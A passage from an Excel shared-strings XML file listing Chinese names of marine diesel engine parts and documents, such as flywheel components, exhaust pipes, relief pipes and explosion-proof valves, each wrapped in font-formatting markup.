        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>反馈支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方法兰</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方向阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形套筒扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形万向接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方形无头螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆保护</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆盖保护器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆门性能试验生产规范</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防爆膜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护手套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护物上部，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护物下部，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护装置布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护装置零件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防火环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防火环活塞总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防溅胶带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防水密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防松垫</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防松垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防污系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防振锥形物的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放大镜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气管阀门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气柜报警装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高压管检测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部挡板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减震器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄柜单元布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄柜单元的管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄柜单元的外形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄箱管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放泄支管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放油盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞溅油传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞溅油检测器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞溅油箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮（毛坯）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮，凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮保护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮标记的草图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮的检修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮端的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮和调频轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮上轴系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮维修说明书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>FLYWHEEL COSING</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> CASING</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>？）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮指示器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞重装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非金属自动润滑套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非主机用齿轮工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废料盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>更改</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体包绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气出口布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气出口管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气出口扩散器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气锅炉水量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气接收器</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气排气管，倾斜的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气排气管，直的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气排气管，总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气排气管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气排气管衬垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气旁通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气膨胀管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气涡轮增压器出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气吸收箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气压力调节装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
